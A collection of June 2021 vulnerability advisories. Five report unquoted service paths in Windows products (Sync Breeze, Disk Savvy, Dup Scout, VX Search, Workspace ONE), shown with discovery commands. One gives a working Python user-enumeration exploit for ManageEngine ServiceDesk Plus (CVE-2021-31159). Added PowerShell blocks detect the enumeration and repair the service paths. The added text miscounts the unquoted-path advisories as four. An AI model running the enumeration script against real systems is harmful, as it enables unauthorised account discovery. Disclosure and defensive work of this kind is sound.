Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path
# Exploit Title: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 16-06-2021
# Vendor Homepage: https://www.syncbreeze.com/
# Software Links:
# https://www.syncbreeze.com/setups_x64/syncbreezesrv_setup_v13.6.18_x64.exe
# https://www.syncbreeze.com/setups_x64/syncbreezeent_setup_v13.6.18_x64.exe
# Tested Version: 13.6.18
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Sync Breeze Server        Sync Breeze Server        C:\Program Files\Sync Breeze Server\bin\syncbrs.exe        Auto
Sync Breeze Enterprise    Sync Breeze Enterprise    C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe    Auto

C:\Users\IEUser>sc qc "Sync Breeze Server"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Sync Breeze Server
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 0   IGNORE
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Sync Breeze Server\bin\syncbrs.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Sync Breeze Server
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem

C:\Users\IEUser>sc qc "Sync Breeze Enterprise"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Sync Breeze Enterprise
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 0   IGNORE
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Sync Breeze Enterprise
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem
-
Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path
# Exploit Title: Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 16-06-2021
# Vendor Homepage: https://www.disksavvy.com
# Software Links:
# https://www.disksavvy.com/setups_x64/disksavvysrv_setup_v13.6.14_x64.exe
# https://www.disksavvy.com/setups_x64/disksavvyent_setup_v13.6.14_x64.exe
# Tested Version: 13.6.14
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Disk Savvy Server        Disk Savvy Server        C:\Program Files\Disk Savvy Server\bin\disksvs.exe        Auto
Disk Savvy Enterprise    Disk Savvy Enterprise    C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe    Auto

C:\>sc qc "Disk Savvy Server"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Disk Savvy Server
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 0   IGNORE
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Disk Savvy Server\bin\disksvs.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Disk Savvy Server
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem

C:\>sc qc "Disk Savvy Enterprise"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Disk Savvy Enterprise
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 0   IGNORE
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Disk Savvy Enterprise
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem
-
Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path
# Exploit Title: Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 16-06-2021
# Vendor Homepage: https://www.dupscout.com
# Software Links:
# https://www.dupscout.com/setups_x64/dupscoutsrv_setup_v13.5.28_x64.exe
# https://www.dupscout.com/setups_x64/dupscoutent_setup_v13.5.28_x64.exe
# Tested Version: 13.5.28
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Dup Scout Server        Dup Scout Server        C:\Program Files\Dup Scout Server\bin\dupscts.exe        Auto
Dup Scout Enterprise    Dup Scout Enterprise    C:\Program Files\Dup Scout Enterprise\bin\dupscts.exe    Auto

C:\>sc qc "Dup Scout Server"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Dup Scout Server
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 0   IGNORE
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Dup Scout Server\bin\dupscts.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Dup Scout Server
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem

C:\>sc qc "Dup Scout Enterprise"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Dup Scout Enterprise
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 0   IGNORE
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Dup Scout Enterprise\bin\dupscts.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Dup Scout Enterprise
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem
-
Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration
# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration
# Date: 17/06/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159)
# Vendor Homepage: https://www.manageengine.com
# Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519
# Version: Previous to build 10519
# Tested on: Zoho ManageEngine ServiceDesk Plus 9.4
# Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE]
# Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159

import argparse
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack')
    parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack')
    parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file')
    parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file')
    my_args = parser.parse_args()
    return my_args


def main():
    args = get_args()
    url = args.target
    domain = args.domain
    usersfile = args.usersfile
    outputfile = args.outputfile
    s = requests.session()
    s.get(url)
    resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify = False)
    incorrect_size = len(resp_incorrect.content)
    print("Incorrect size: %s"%(incorrect_size))
    correct_users = []
    users = open(usersfile).read().splitlines()
    for u in users:
        resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify = False)
        valid = (len(resp.content) != incorrect_size)
        if valid:
            correct_users.append(u)
        print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content),str(valid)))
    print("\nCorrect users\n")
    with open(outputfile, 'w') as f:
        for user in correct_users:
            f.write("%s\n" % user)
            print("- %s"%(user))
    print("\nResults stored in %s\n"%(outputfile))


if __name__ == "__main__":
    main()
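The enumeration above works because the ForgotPassword.sd endpoint answers a known and an unknown userName with responses of different sizes, so a scan shows up in the application's access log as one client cycling through many userName values against that one endpoint, most of them getting the same "unknown" body size. The PowerShell below is an added detection example, not part of the advisory or of ManageEngine's product: it groups ForgotPassword.sd requests by client, counts distinct userName values, and reports clients over a threshold. The log lines are constructed samples in common log format, and the field layout, the threshold and the function name are assumptions.

```powershell
# Added example (not from the advisory): flag clients that probe ForgotPassword.sd
# with many different userName values. Input is an array of access-log lines in
# common log format (constructed layout; adapt the regex to your server's format).

function Find-ForgotPasswordEnumeration {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string[]]$LogLine,
        [int]$Threshold = 5   # distinct userName values from one client before alerting
    )

    # client - - [timestamp] "METHOD /ForgotPassword.sd?query HTTP/x" status bytes
    $pattern = '^(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) /ForgotPassword\.sd\?(?<query>[^" ]*) HTTP/[\d.]+" (?<status>\d{3}) (?<bytes>\S+)'

    $hits = foreach ($line in $LogLine) {
        if ($line -match $pattern) {
            $user = $null
            foreach ($kv in ($Matches.query -split '&')) {
                $name, $value = $kv -split '=', 2
                if ($name -eq 'userName' -and $value) {
                    $user = [uri]::UnescapeDataString($value)
                }
            }
            if ($null -ne $user) {
                [pscustomobject]@{ Ip = $Matches.ip; User = $user; Bytes = $Matches.bytes }
            }
        }
    }

    $hits | Group-Object Ip | ForEach-Object {
        $distinct = @($_.Group.User | Sort-Object -Unique)
        if ($distinct.Count -ge $Threshold) {
            [pscustomobject]@{
                Ip            = $_.Name
                Requests      = $_.Count
                DistinctUsers = $distinct.Count
                # Two different body sizes for the same endpoint is the oracle the script relies on.
                ResponseSizes = (@($_.Group.Bytes | Sort-Object -Unique) -join ',')
            }
        }
    }
}

# Constructed sample: 10.0.0.7 sweeps five names (the first is the "surely unknown" probe),
# 192.168.1.20 is an ordinary user who forgot their password once.
$sample = @(
    '10.0.0.7 - - [17/Jun/2021:10:00:01 +0000] "GET /ForgotPassword.sd?userName=nonexistentuserforsure&dname=CORP HTTP/1.1" 200 5120',
    '10.0.0.7 - - [17/Jun/2021:10:00:02 +0000] "GET /ForgotPassword.sd?userName=alice&dname=CORP HTTP/1.1" 200 5214',
    '10.0.0.7 - - [17/Jun/2021:10:00:02 +0000] "GET /ForgotPassword.sd?userName=bob&dname=CORP HTTP/1.1" 200 5120',
    '10.0.0.7 - - [17/Jun/2021:10:00:03 +0000] "GET /ForgotPassword.sd?userName=carol&dname=CORP HTTP/1.1" 200 5120',
    '10.0.0.7 - - [17/Jun/2021:10:00:03 +0000] "GET /ForgotPassword.sd?userName=dave&dname=CORP HTTP/1.1" 200 5214',
    '192.168.1.20 - - [17/Jun/2021:10:05:00 +0000] "GET /ForgotPassword.sd?userName=erin&dname=CORP HTTP/1.1" 200 5214',
    '192.168.1.20 - - [17/Jun/2021:10:05:30 +0000] "GET /HomePage.do HTTP/1.1" 200 18000'
)

Find-ForgotPasswordEnumeration -LogLine $sample -Threshold 5 | Format-Table -AutoSize
```

On the sample this reports 10.0.0.7 with 5 requests, 5 distinct users and two response sizes (5120 and 5214); 192.168.1.20 stays below the threshold. The lasting fix is the vendor's build 10519 referenced in the advisory header, which removes the size difference; the detection is for the window before that update is applied, and for spotting the same pattern against other "forgot password" style endpoints.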
-
VX Search 13.5.28 - 'Multiple' Unquoted Service Path
# Exploit Title: VX Search 13.5.28 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 16-06-2021
# Vendor Homepage: https://www.vxsearch.com
# Software Links:
# https://www.vxsearch.com/setups_x64/vxsearchsrv_setup_v13.5.28_x64.exe
# https://www.vxsearch.com/setups_x64/vxsearchent_setup_v13.5.28_x64.exe
# Tested Version: 13.5.28
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

VX Search Server      VX Search Server      C:\Program Files\VX Search Server\bin\vxsrchs.exe      Auto
VX Search Enterprise  VX Search Enterprise  C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe  Auto

C:\>sc qc "VX Search Server"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: VX Search Server
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search Server\bin\vxsrchs.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : VX Search Server
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

C:\>sc qc "VX Search Enterprise"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: VX Search Enterprise
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : VX Search Enterprise
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
-
Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path
# Exploit Title: Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 06-16-2021
# Vendor Homepage: https://www.vmware.com/mx/products/workspace-one/intelligent-hub.html
# Software Links : https://getwsone.com/
# Tested Version: 20.3.8.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """

VMware Hub Health Monitoring Service  VMware Hub Health Monitoring Service  C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe  Auto

C:\>sc qc "VMware Hub Health Monitoring Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: VMware Hub Health Monitoring Service
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : VMware Hub Health Monitoring Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
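All four unquoted-service-path advisories on this page (Disk Savvy, Dup Scout, VX Search and Workspace ONE Intelligent Hub) follow the same pattern: an auto-start service running as LocalSystem whose binary path contains spaces and is stored without quotes, found with the wmic/findstr one-liner and confirmed with sc qc. The PowerShell below is an added example for the defender's side of that procedure and is not part of any of the advisories or vendors' code: it performs the same audit from Win32_Service without relying on findstr filtering, derives the correctly quoted value for each finding, and can write that value back to the service's ImagePath in the registry. It assumes an elevated session on the host being audited; the function names are assumptions.

```powershell
# Added example (not from the advisories): audit services for unquoted ImagePath
# values that contain spaces, and optionally re-quote them. Run elevated.

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()

    # Win32_Service.PathName is the path exactly as the SCM stores it, quotes included,
    # so a leading double quote means the path is already safe.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { return }
        if ($path.StartsWith('"')) { return }
        # Same exclusion as the advisories' findstr /v "c:\windows\\": OS-owned paths are not user-writable.
        if ($path -match '^[A-Za-z]:\\Windows\\') { return }

        # Split the executable from its arguments at the first ".exe".
        $exeEnd = $path.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
        if ($exeEnd -lt 0) { return }
        $exePath   = $path.Substring(0, $exeEnd + 4)
        $arguments = $path.Substring($exeEnd + 4).Trim()

        # Only a space somewhere inside the executable path lets the SCM try shorter candidates.
        if ($exePath -notmatch ' ') { return }

        $fixed = '"' + $exePath + '"'
        if ($arguments) { $fixed += ' ' + $arguments }

        [pscustomobject]@{
            Name      = $_.Name
            StartMode = $_.StartMode
            StartName = $_.StartName   # LocalSystem in all four advisories: the privilege at stake
            ImagePath = $path
            FixedPath = $fixed
        }
    }
}

function Repair-UnquotedServicePath {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [pscustomobject]$Finding
    )
    process {
        # Writing ImagePath directly avoids the quote-escaping pitfalls of passing the
        # value through sc.exe config; the new value applies on the next service start.
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($Finding.Name)"
        if ($PSCmdlet.ShouldProcess($Finding.Name, "set ImagePath to $($Finding.FixedPath)")) {
            Set-ItemProperty -Path $key -Name ImagePath -Value $Finding.FixedPath -Type ExpandString
        }
    }
}

# Usage:
#   Get-UnquotedServicePath | Format-Table Name, StartMode, StartName, ImagePath -AutoSize
#   Get-UnquotedServicePath | Repair-UnquotedServicePath -WhatIf    # preview the changes
#   Get-UnquotedServicePath | Repair-UnquotedServicePath            # apply them
```

On a host with one of the products above installed, the audit lists the service with its unquoted path and the FixedPath it would write, for example "C:\Program Files\Disk Savvy Server\bin\disksvs.exe". Two practical caveats: a finding is only exploitable where a lower-privileged user can create files in one of the intermediate directories (C:\Program Files and C:\Program Files (x86) are not writable by standard users by default, so check the ACLs on the path before treating a report as a live privilege escalation), and a registry repair can be undone by the product's own installer or updater, so the durable fix is a vendor build that registers the service with a quoted path.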